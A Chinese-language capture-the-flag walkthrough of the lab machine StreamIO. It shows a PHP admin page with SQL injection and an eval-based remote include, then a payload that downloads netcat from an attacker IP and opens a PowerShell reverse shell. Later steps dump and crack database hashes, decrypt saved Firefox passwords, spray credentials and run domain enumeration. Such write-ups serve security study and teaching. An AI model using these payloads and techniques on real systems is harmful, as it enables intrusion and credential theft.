<h1>Movie managment</h1>
<?php
if(!defined('included'))
die("Only accessable through includes");
if(isset($_POST['movie_id']))
{
$query = "delete from movies where id = ".$_POST['movie_id'];
$res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
}
$query = "select * from movies order by movie";
$res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
while($row = sqlsrv_fetch_array($res, SQLSRV_FETCH_ASSOC))
{
?>
<div>
<div class="form-control" style="height: 3rem;">
<h4 style="float:left;"><?php echo $row['movie']; ?></h4>
<div style="float:right;padding-right: 25px;">
<form method="POST" action="?movie=">
<input type="hidden" name="movie_id" value="<?php echo $row['id']; ?>">
<input type="submit" class="btn btn-sm btn-primary" value="Delete">
</form>
</div>
</div>
</div>
<?php
} # while end
?>
<br><hr><br>
<h1>Staff managment</h1>
<?php
if(!defined('included'))
die("Only accessable through includes");
$query = "select * from users where is_staff = 1 ";
$res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
if(isset($_POST['staff_id']))
{
?>
<div class="alert alert-success"> Message sent to administrator</div>
<?php
}
$query = "select * from users where is_staff = 1";
$res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
while($row = sqlsrv_fetch_array($res, SQLSRV_FETCH_ASSOC))
{
?>
<div>
<div class="form-control" style="height: 3rem;">
<h4 style="float:left;"><?php echo $row['username']; ?></h4>
<div style="float:right;padding-right: 25px;">
<form method="POST">
<input type="hidden" name="staff_id" value="<?php echo $row['id']; ?>">
<input type="submit" class="btn btn-sm btn-primary" value="Delete">
</form>
</div>
</div>
</div>
<?php
} # while end
?>
<br><hr><br>
<h1>User managment</h1>
<?php
if(!defined('included'))
die("Only accessable through includes");
if(isset($_POST['user_id']))
{
$query = "delete from users where is_staff = 0 and id = ".$_POST['user_id'];
$res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
}
$query = "select * from users where is_staff = 0";
$res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
while($row = sqlsrv_fetch_array($res, SQLSRV_FETCH_ASSOC))
{
?>
<div>
<div class="form-control" style="height: 3rem;">
<h4 style="float:left;"><?php echo $row['username']; ?></h4>
<div style="float:right;padding-right: 25px;">
<form method="POST">
<input type="hidden" name="user_id" value="<?php echo $row['id']; ?>">
<input type="submit" class="btn btn-sm btn-primary" value="Delete">
</form>
</div>
</div>
</div>
<?php
} # while end
?>
<br><hr><br>
<form method="POST">
<input name="include" hidden>
</form>
<?php
if(isset($_POST['include']))
{
if($_POST['include'] !== "index.php" )
eval(file_get_contents($_POST['include']));
else
echo(" ---- ERROR ---- ");
}
?>
审计分析:
关键在于最后的部分,如果 $_POST['include']
的值不等于 index.php
,则通过 eval() 函数执行 $_POST['include']
参数指定文件的内容,这也就意味着我们可以利用它来构造反弹shell,这是很顺理成章的事
文件包含配合反弹shell
先准备一个nc64.exe
,然后构造php脚本:
system("powershell -c wget 10.10.16.10/nc64.exe -outfile \\programdata\\nc64.exe");
system("\\programdata\\nc64.exe -e powershell 10.10.16.10 443");
这里选择把结果输出到programdata
目录下,因为不同用户都可以访问该共享目录
同时用python在本地建立web服务器,并且建立nc的监听
接着,利用burpsuite
或curl
来完成剩下的过程都可以,为了直观展示这里用curl:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# curl -X POST 'https://streamio.htb/admin/?debug=master.php' -k -b 'PHPSESSID=pv555d6n9ruo2s7btcml2nli93' -d 'include=http://10.10.16.10/revshell.php'
执行上面的命令后,我们在本地的nc监听中反弹到了shell:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# nc -lnvp 443
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Ncat: Listening on [::]:443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.129.225.176:51663.
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\inetpub\streamio.htb\admin> whoami
whoami
streamio\yoshihide
PS C:\inetpub\streamio.htb\admin> whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
然而我们并没有找到flaguser.txt
,该用户也没有对应的家目录,能够利用的权限也很少,就是一个普通的webshell,为了提高该shell的交互性,我们还可以用工具rlwrap
,将nc的监听替换成该工具,然后重新反弹一次shell:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# rlwrap -cAr nc -lnvp 443
尝试横向迁移
探测php文件与数据库连接部分,看是否泄漏凭据
PS C:\inetpub\streamio.htb> dir -recurse *.php | select-string -pattern "database"
dir -recurse *.php | select-string -pattern "database"
admin\index.php:9:$connection = array("Database"=>"STREAMIO", "UID" => "db_admin", "PWD" => 'B1@hx31234567890');
login.php:46:$connection = array("Database"=>"STREAMIO" , "UID" => "db_user", "PWD" => 'B1@hB1@hB1@h');
register.php:81: $connection = array("Database"=>"STREAMIO", "UID" => "db_admin", "PWD" => 'B1@hx31234567890');
PS C:\inetpub\streamio.htb> cd ../watch.streamio.htb
cd ../watch.streamio.htb
PS C:\inetpub\watch.streamio.htb> dir -recurse *.php | select-string -pattern "database"
dir -recurse *.php | select-string -pattern "database"
search.php:15:$connection = array("Database"=>"STREAMIO", "UID" => "db_user", "PWD" => 'B1@hB1@hB1@h');
PS C:\inetpub\watch.streamio.htb>
确实获取到了一些凭据,其中db_admin
是我们最感兴趣的,由这个名字自然可以联想到很可能就是sqlserver
的管理员用户
尝试连接sqlserver
先查看目标靶机是否有可以连接sqlserver
的交互程序:
PS C:\inetpub\watch.streamio.htb> where.exe sqlcmd
where.exe sqlcmd
C:\Program Files\Microsoft SQL Server\Client SDK\ODBC\170\Tools\Binn\SQLCMD.EXE
由于我们用rlwrap
提高了shell的交互性,下面的操作可以直接在靶机完成,否则需要利用端口转发的方式(如果靶机速度慢或不想留下太多活动信息也可以选择)在我们的kali上操作,开始连接:
PS C:\inetpub\watch.streamio.htb> sqlcmd -S localhost -U db_admin -P B1@hx31234567890 -d streamio_backup -Q "SELECT name FROM sys.tables;"
sqlcmd -S localhost -U db_admin -P B1@hx31234567890 -d streamio_backup -Q "SELECT name FROM sys.tables;"
name
--------------------------------------------------------------------------------------------------------------------------------
movies
users
(2 rows affected)
PS C:\inetpub\watch.streamio.htb> sqlcmd -S localhost -U db_admin -P B1@hx31234567890 -d streamio_backup -Q "SELECT * FROM users;"
sqlcmd -S localhost -U db_admin -P B1@hx31234567890 -d streamio_backup -Q "SELECT * FROM users;"
id username password
----------- -------------------------------------------------- --------------------------------------------------
1 nikk37 389d14cb8e4e9b94b137deb1caf0612a
2 yoshihide b779ba15cedfd22a023c4d8bcf5f2332
3 James c660060492d9edcaa8332d89c99c9239
4 Theodore 925e5408ecb67aea449373d668b7359e
5 Samantha 083ffae904143c4796e464dac33c1f7d
6 Lauren 08344b85b329d7efd611b7a7743e8a09
7 William d62be0dc82071bccc1322d64ec5b6c51
8 Sabrina f87d3c0d6c8fd686aacc6627f1f493a5
(8 rows affected)
这里选择查询streamio_backup
备份数据库中的数据,因为备份数据库中往往可能存在历史用户凭据,而这在当前的数据库是找不到的,并且数据库streamio
已经被我们利用过了
处理数据:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# cat creds_dbbackup.txt | awk -F' ' '{print $2":"$3}' | tee creds_dbbackup.txt
破解hash:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# hashcat creds_dbbackup.txt /usr/share/wordlists/rockyou.txt -m 0 --user --show
nikk37:389d14cb8e4e9b94b137deb1caf0612a:get_dem_girls2@yahoo.com
yoshihide:b779ba15cedfd22a023c4d8bcf5f2332:66boysandgirls..
Lauren:08344b85b329d7efd611b7a7743e8a09:##123a8j8w5123##
Sabrina:f87d3c0d6c8fd686aacc6627f1f493a5:!!sabrina$
回顾之前的shell,发现这里的用户nikk37
正好有其对应的家目录,所以我们优先尝试利用该用户进行横向迁移
利用evil-winrm连接
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# evil-winrm -u nikk37 -p 'get_dem_girls2@yahoo.com' -i streamio.htb
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\nikk37\Documents> whoami
streamio\nikk37
获取立足点
*Evil-WinRM* PS C:\Users\nikk37\Documents> cd ../desktop
*Evil-WinRM* PS C:\Users\nikk37\desktop> ls
Directory: C:\Users\nikk37\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 2/26/2024 1:49 AM 34 user.txt
*Evil-WinRM* PS C:\Users\nikk37\desktop> cat user.txt
f45a4a88b84668351f92a3729cac0011
f45a4a88b84668351f92a3729cac0011
后渗透信息搜集
显然,横向迁移成功后首先要看当前用户的权限与所在组
*Evil-WinRM* PS C:\Users\nikk37\desktop> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\nikk37\desktop> net user nikk37
User name nikk37
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 2/22/2022 1:57:16 AM
Password expires Never
Password changeable 2/23/2022 1:57:16 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 2/22/2022 2:39:51 AM
Logon hours allowed All
Local Group Memberships *Remote Management Use
Global Group memberships *Domain Users
The command completed successfully.
并没有特别让我们感兴趣的
查看本地都安装了哪些程序,便于扩展我们的攻击面:
*Evil-WinRM* PS C:\> cd 'Program Files'
*Evil-WinRM* PS C:\Program Files> ls
Directory: C:\Program Files
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/22/2022 1:35 AM Common Files
d----- 2/22/2022 2:57 AM iis express
d----- 3/28/2022 4:46 PM internet explorer
d----- 2/22/2022 2:14 AM LAPS
d----- 2/22/2022 2:52 AM Microsoft
d----- 2/22/2022 1:54 AM Microsoft SQL Server
d----- 2/22/2022 1:53 AM Microsoft Visual Studio 10.0
d----- 2/22/2022 1:53 AM Microsoft.NET
d----- 2/25/2022 11:35 PM PHP
d----- 2/22/2022 2:56 AM Reference Assemblies
d----- 2/22/2022 2:56 AM runphp
d----- 2/22/2022 1:35 AM VMware
d-r--- 3/28/2022 4:46 PM Windows Defender
d----- 3/28/2022 6:06 PM Windows Defender Advanced Threat Protection
d----- 3/28/2022 4:46 PM Windows Mail
d----- 3/28/2022 4:46 PM Windows Media Player
d----- 9/15/2018 12:19 AM Windows Multimedia Platform
d----- 9/15/2018 12:28 AM windows nt
d----- 3/28/2022 4:46 PM Windows Photo Viewer
d----- 9/15/2018 12:19 AM Windows Portable Devices
d----- 9/15/2018 12:19 AM Windows Security
d----- 9/15/2018 12:19 AM WindowsPowerShell
*Evil-WinRM* PS C:\Program Files> cd ..\'Program Files (x86)'
*Evil-WinRM* PS C:\Program Files (x86)> ls
Directory: C:\Program Files (x86)
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/15/2018 12:28 AM Common Files
d----- 2/25/2022 11:35 PM IIS
d----- 2/25/2022 11:38 PM iis express
d----- 3/28/2022 4:46 PM Internet Explorer
d----- 2/22/2022 1:54 AM Microsoft SQL Server
d----- 2/22/2022 1:53 AM Microsoft.NET
d----- 5/26/2022 4:09 PM Mozilla Firefox
d----- 5/26/2022 4:09 PM Mozilla Maintenance Service
d----- 2/25/2022 11:33 PM PHP
d----- 2/22/2022 2:56 AM Reference Assemblies
d----- 3/28/2022 4:46 PM Windows Defender
d----- 3/28/2022 4:46 PM Windows Mail
d----- 3/28/2022 4:46 PM Windows Media Player
d----- 9/15/2018 12:19 AM Windows Multimedia Platform
d----- 9/15/2018 12:28 AM windows nt
d----- 3/28/2022 4:46 PM Windows Photo Viewer
d----- 9/15/2018 12:19 AM Windows Portable Devices
d----- 9/15/2018 12:19 AM WindowsPowerShell
其中,LAPS
和Mozilla Firefox
是最令人感兴趣的,因为它们中也可能存在凭据的泄漏
尝试从filefox中获取泄漏凭据并破解
搜索:
我们还在firefox的官方文档中知道了密码存放的文件:
*Evil-WinRM* PS C:\users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles> cd 5rwivk2l.default
*Evil-WinRM* PS C:\users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles\5rwivk2l.default> ls
Directory: C:\users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles\5rwivk2l.default
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/22/2022 2:40 AM 47 times.json
*Evil-WinRM* PS C:\users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles\5rwivk2l.default> cd ..\br53rxeg.default-release
*Evil-WinRM* PS C:\users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles\br53rxeg.default-release> ls
Directory: C:\users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles\br53rxeg.default-release
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/22/2022 2:40 AM bookmarkbackups
d----- 2/22/2022 2:40 AM browser-extension-data
d----- 2/22/2022 2:41 AM crashes
d----- 2/22/2022 2:42 AM datareporting
d----- 2/22/2022 2:40 AM minidumps
d----- 2/22/2022 2:42 AM saved-telemetry-pings
d----- 2/22/2022 2:40 AM security_state
d----- 2/22/2022 2:42 AM sessionstore-backups
d----- 2/22/2022 2:40 AM storage
-a---- 2/22/2022 2:40 AM 24 addons.json
-a---- 2/22/2022 2:42 AM 5189 addonStartup.json.lz4
-a---- 2/22/2022 2:42 AM 310 AlternateServices.txt
-a---- 2/22/2022 2:41 AM 229376 cert9.db
-a---- 2/22/2022 2:40 AM 208 compatibility.ini
-a---- 2/22/2022 2:40 AM 939 containers.json
-a---- 2/22/2022 2:40 AM 229376 content-prefs.sqlite
-a---- 2/22/2022 2:40 AM 98304 cookies.sqlite
-a---- 2/22/2022 2:40 AM 1081 extension-preferences.json
-a---- 2/22/2022 2:40 AM 43726 extensions.json
-a---- 2/22/2022 2:42 AM 5242880 favicons.sqlite
-a---- 2/22/2022 2:41 AM 262144 formhistory.sqlite
-a---- 2/22/2022 2:40 AM 778 handlers.json
-a---- 2/22/2022 2:40 AM 294912 key4.db
-a---- 2/22/2022 2:41 AM 1593 logins-backup.json
-a---- 2/22/2022 2:41 AM 2081 logins.json
-a---- 2/22/2022 2:42 AM 0 parent.lock
-a---- 2/22/2022 2:42 AM 98304 permissions.sqlite
-a---- 2/22/2022 2:40 AM 506 pkcs11.txt
-a---- 2/22/2022 2:42 AM 5242880 places.sqlite
-a---- 2/22/2022 2:42 AM 8040 prefs.js
-a---- 2/22/2022 2:42 AM 180 search.json.mozlz4
-a---- 2/22/2022 2:42 AM 288 sessionCheckpoints.json
-a---- 2/22/2022 2:42 AM 1853 sessionstore.jsonlz4
-a---- 2/22/2022 2:40 AM 18 shield-preference-experiments.json
-a---- 2/22/2022 2:42 AM 611 SiteSecurityServiceState.txt
-a---- 2/22/2022 2:42 AM 4096 storage.sqlite
-a---- 2/22/2022 2:40 AM 50 times.json
-a---- 2/22/2022 2:40 AM 98304 webappsstore.sqlite
-a---- 2/22/2022 2:42 AM 141 xulstore.json
我们也确实找到了这两个文件,当我们查看内容时,有部分是乱码,并且显示的密码是加密形式,我们可以再尝试寻找是否有专门破解firefox密码的工具:
大致阅读了解其破解原理以及工具的原理后,找到了一个不需要NSS库,只需要python就能运行的工具:
https://github.com/lclevy/firepwd
先把关键的文件传输到kali中:
*Evil-WinRM* PS C:\users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles\br53rxeg.default-release> download key4.db
Info: Downloading C:\users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles\br53rxeg.default-release\key4.db to key4.db
Info: Download successful!
*Evil-WinRM* PS C:\users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles\br53rxeg.default-release> download logins.json
Info: Downloading C:\users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles\br53rxeg.default-release\logins.json to logins.json
Info: Download successful!
以防万一,可以把firefox根目录的nss库也下载下来:
*Evil-WinRM* PS C:\Users\nikk37\Documents> cd C:\'Program Files (x86)'\'Mozilla Firefox'
*Evil-WinRM* PS C:\Program Files (x86)\Mozilla Firefox> download nss3.dll
Info: Downloading C:\Program Files (x86)\Mozilla Firefox\nss3.dll to nss3.dll
Info: Download successful!
开始尝试破解:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# git clone https://github.com/lclevy/firepwd.git
。。。
┌──(root㉿hunter)-[/home/…/Desktop/htb/StreamIO/firepwd]
└─# chmod +x firepwd.py
┌──(root㉿hunter)-[/home/…/Desktop/htb/StreamIO/firepwd]
└─# ./firepwd.py
./firepwd.py: 行 17:
decode Firefox passwords (https://github.com/lclevy/firepwd)
lclevy@free.fr
28 Aug 2013: initial version, Oct 2016: support for logins.json, Feb 2018: support for key4.db,
Apr2020: support for NSS 3.49 / Firefox 75.0 : https://hg.mozilla.org/projects/nss/rev/fc636973ad06392d11597620b602779b4af312f6
for educational purpose only, not production level
integrated into https://github.com/AlessandroZ/LaZagne
tested with python 3.7.3, PyCryptodome 3.9.0 and pyasn 0.4.8
key3.db is read directly, the 3rd party bsddb python module is NOT needed
NSS library is NOT needed
profile directory under Win10 is C:\\Users\\[user]\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\[profile_name]
: 没有那个文件或目录
./firepwd.py: 行 19: from: 未找到命令
./firepwd.py: 行 20: import: 未找到命令
./firepwd.py: 行 21: from: 未找到命令
./firepwd.py: 行 22: import: 未找到命令
./firepwd.py: 行 23: from: 未找到命令
./firepwd.py: 行 25: from: 未找到命令
./firepwd.py: 行 26: from: 未找到命令
./firepwd.py: 行 27: import: 未找到命令
./firepwd.py: 行 28: from: 未找到命令
./firepwd.py: 行 29: from: 未找到命令
./firepwd.py: 行 30: from: 未找到命令
./firepwd.py: 行 31: from: 未找到命令
./firepwd.py: 行 32: import: 未找到命令
./firepwd.py: 行 33: from: 未找到命令
./firepwd.py: 行 35: 未预期的记号 "(" 附近有语法错误
./firepwd.py: 行 35: `def getShortLE(d, a):'
# 报错表明需要先把刚才的两个关键凭据文件放入到该目录下
┌──(root㉿hunter)-[/home/…/Desktop/htb/StreamIO/firepwd]
└─# cd ..
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# mkdir firefox_creds
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# cp key4.db logins.json ./firefox_creds
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# python3 ./firepwd/firepwd.py firefox_creds
Traceback (most recent call last):
File "/home/cvestone/Desktop/htb/StreamIO/./firepwd/firepwd.py", line 28, in <module>
from Crypto.Cipher import DES3, AES
ModuleNotFoundError: No module named 'Crypto'
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# pip3 install pycryptodome
。。。
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# python3 ./firepwd/firepwd.py firefox_creds
globalSalt: b'd215c391179edb56af928a06c627906bcbd4bd47'
SEQUENCE {
SEQUENCE {
OBJECTIDENTIFIER 1.2.840.113549.1.5.13 pkcs5 pbes2
SEQUENCE {
SEQUENCE {
OBJECTIDENTIFIER 1.2.840.113549.1.5.12 pkcs5 PBKDF2
SEQUENCE {
OCTETSTRING b'5d573772912b3c198b1e3ee43ccb0f03b0b23e46d51c34a2a055e00ebcd240f5'
INTEGER b'01'
INTEGER b'20'
SEQUENCE {
OBJECTIDENTIFIER 1.2.840.113549.2.9 hmacWithSHA256
}
}
}
SEQUENCE {
OBJECTIDENTIFIER 2.16.840.1.101.3.4.1.42 aes256-CBC
OCTETSTRING b'1baafcd931194d48f8ba5775a41f'
}
}
}
OCTETSTRING b'12e56d1c8458235a4136b280bd7ef9cf'
}
clearText b'70617373776f72642d636865636b0202'
password check? True
SEQUENCE {
SEQUENCE {
OBJECTIDENTIFIER 1.2.840.113549.1.5.13 pkcs5 pbes2
SEQUENCE {
SEQUENCE {
OBJECTIDENTIFIER 1.2.840.113549.1.5.12 pkcs5 PBKDF2
SEQUENCE {
OCTETSTRING b'098560d3a6f59f76cb8aad8b3bc7c43d84799b55297a47c53d58b74f41e5967e'
INTEGER b'01'
INTEGER b'20'
SEQUENCE {
OBJECTIDENTIFIER 1.2.840.113549.2.9 hmacWithSHA256
}
}
}
SEQUENCE {
OBJECTIDENTIFIER 2.16.840.1.101.3.4.1.42 aes256-CBC
OCTETSTRING b'e28a1fe8bcea476e94d3a722dd96'
}
}
}
OCTETSTRING b'51ba44cdd139e4d2b25f8d94075ce3aa4a3d516c2e37be634d5e50f6d2f47266'
}
clearText b'b3610ee6e057c4341fc76bc84cc8f7cd51abfe641a3eec9d0808080808080808'
decrypting login/password pairs
https://slack.streamio.htb:b'admin',b'JDg0dd1s@d0p3cr3@t0r'
https://slack.streamio.htb:b'nikk37',b'n1kk1sd0p3t00:)'
https://slack.streamio.htb:b'yoshihide',b'paddpadd@12'
https://slack.streamio.htb:b'JDgodd',b'password@12'
# 已经破解出了一些凭据
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# python3 ./firepwd/firepwd.py firefox_creds | tee firefox_cracked
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# cat firefox_cracked | awk -F"'" '{print $2":"$4}' | tee firefox_crackedcreds
admin:JDg0dd1s@d0p3cr3@t0r
nikk37:n1kk1sd0p3t00:)
yoshihide:paddpadd@12
JDgodd:password@12
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# cat firefox_cracked | awk -F"'" '{print $2}' | tee firefox_crackeduser
admin
nikk37
yoshihide
JDgodd
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# cat firefox_cracked | awk -F"'" '{print $4}' | tee firefox_crackedpwd
JDg0dd1s@d0p3cr3@t0r
n1kk1sd0p3t00:)
paddpadd@12
password@12
再次尝试获取smb共享
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# crackmapexec smb streamio.htb -u firefox_crackeduser -p firefox_crackedpwd --continue-on-success
SMB streamio.htb 445 DC [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:streamIO.htb) (signing:True) (SMBv1:False)
SMB streamio.htb 445 DC [-] streamIO.htb\admin:JDg0dd1s@d0p3cr3@t0r STATUS_LOGON_FAILURE
SMB streamio.htb 445 DC [-] streamIO.htb\admin:n1kk1sd0p3t00:) STATUS_LOGON_FAILURE
SMB streamio.htb 445 DC [-] streamIO.htb\admin:paddpadd@12 STATUS_LOGON_FAILURE
SMB streamio.htb 445 DC [-] streamIO.htb\admin:password@12 STATUS_LOGON_FAILURE
SMB streamio.htb 445 DC [-] streamIO.htb\nikk37:JDg0dd1s@d0p3cr3@t0r STATUS_LOGON_FAILURE
SMB streamio.htb 445 DC [-] streamIO.htb\nikk37:n1kk1sd0p3t00:) STATUS_LOGON_FAILURE
SMB streamio.htb 445 DC [-] streamIO.htb\nikk37:paddpadd@12 STATUS_LOGON_FAILURE
SMB streamio.htb 445 DC [-] streamIO.htb\nikk37:password@12 STATUS_LOGON_FAILURE
SMB streamio.htb 445 DC [-] streamIO.htb\yoshihide:JDg0dd1s@d0p3cr3@t0r STATUS_LOGON_FAILURE
SMB streamio.htb 445 DC [-] streamIO.htb\yoshihide:n1kk1sd0p3t00:) STATUS_LOGON_FAILURE
SMB streamio.htb 445 DC [-] Connection Error: The NETBIOS connection with the remote host timed out.
SMB streamio.htb 445 DC [-] streamIO.htb\yoshihide:password@12 STATUS_LOGON_FAILURE
SMB streamio.htb 445 DC [+] streamIO.htb\JDgodd:JDg0dd1s@d0p3cr3@t0r
SMB streamio.htb 445 DC [-] streamIO.htb\JDgodd:n1kk1sd0p3t00:) STATUS_LOGON_FAILURE
SMB streamio.htb 445 DC [-] streamIO.htb\JDgodd:paddpadd@12 STATUS_LOGON_FAILURE
SMB streamio.htb 445 DC [-] streamIO.htb\JDgodd:password@12 STATUS_LOGON_FAILURE
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# crackmapexec winrm streamio.htb -u firefox_crackeduser -p firefox_crackedpwd --continue-on-success
SMB streamio.htb 5985 NONE [*] None (name:streamio.htb) (domain:None)
HTTP streamio.htb 5985 NONE [*] http://streamio.htb:5985/wsman
WINRM streamio.htb 5985 NONE [-] None\admin:JDg0dd1s@d0p3cr3@t0r
WINRM streamio.htb 5985 NONE [-] None\admin:n1kk1sd0p3t00:)
WINRM streamio.htb 5985 NONE [-] None\admin:paddpadd@12
WINRM streamio.htb 5985 NONE [-] None\admin:password@12
WINRM streamio.htb 5985 NONE [-] None\nikk37:JDg0dd1s@d0p3cr3@t0r
WINRM streamio.htb 5985 NONE [-] None\nikk37:n1kk1sd0p3t00:)
WINRM streamio.htb 5985 NONE [-] None\nikk37:paddpadd@12
WINRM streamio.htb 5985 NONE [-] None\nikk37:password@12
WINRM streamio.htb 5985 NONE [-] None\yoshihide:JDg0dd1s@d0p3cr3@t0r
WINRM streamio.htb 5985 NONE [-] None\yoshihide:n1kk1sd0p3t00:)
WINRM streamio.htb 5985 NONE [-] None\yoshihide:paddpadd@12
WINRM streamio.htb 5985 NONE [-] None\yoshihide:password@12
WINRM streamio.htb 5985 NONE [-] None\JDgodd:JDg0dd1s@d0p3cr3@t0r
WINRM streamio.htb 5985 NONE [-] None\JDgodd:n1kk1sd0p3t00:)
WINRM streamio.htb 5985 NONE [-] None\JDgodd:paddpadd@12
WINRM streamio.htb 5985 NONE [-] None\JDgodd:password@12
发现只有一个凭据可以使用,尝试访问smb:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# smbmap -H streamio.htb -u JDgodd -p 'JDg0dd1s@d0p3cr3@t0r'
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)
[+] IP: 10.129.225.102:445 Name: streamio.htb Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
没有权限访问,但这是一个有效的凭据,先保存下来
到这里,我们接下来要权限提升,又由于是在域环境中,就要按照域渗透的思路
域渗透
刚来到一个陌生的域环境中,最高效的方式就是利用bloodhound对目标域进行信息采集,然后可以分析出动态活动目录中所有的域成员、组之间的关系,以及潜在的攻击路径等
bloodhound采集域信息分析攻击路径
使用bloodhound采集器bloodhound-python
之前,先要获取一个较高权限的用户,我们获取到了两个可用的用户凭据,但是没法确定哪个权限更高,但可以确定的是JDgodd
是更活跃的用户,可以先尝试该用户
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# bloodhound-python -c ALL -u JDgodd -p 'JDg0dd1s@d0p3cr3@t0r' -d streamio.htb -dc streamio.htb -ns 10.129.206.188 --zip
INFO: Found AD domain: streamio.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: streamio.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: streamio.htb
INFO: Found 8 users
INFO: Found 54 groups
INFO: Found 4 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC.streamIO.htb
INFO: Done in 00M 37S
INFO: Compressing output into 20240227142202_bloodhound.zip
将采集结果导入到bloodhound,在这之前,一定要先初始化neo4j
数据库:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# neo4j restart
。。。
打开bloodhound主界面后,导入.zip
文件,然后先搜索已经占用的资产,标记为owned
,在该用户节点分析中直接点击寻找最短路径:
然后将目标DC设置为ending
:
可以点击路径中的方法的help
查看具体利用帮助:
bloodhound与手工采集分析域攻击路径的联系
其实bloodhound
并不神秘,实际上也就是我们在域中使用手工命令采集信息手段的整合,如下:
*Evil-WinRM* PS C:\Users\nikk37\Documents> net user JDgodd
User name JDgodd
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 2/22/2022 1:56:42 AM
Password expires Never
Password changeable 2/23/2022 1:56:42 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 2/26/2022 10:17:08 AM
Logon hours allowed All
Local Group Memberships
Global Group memberships *Domain Users
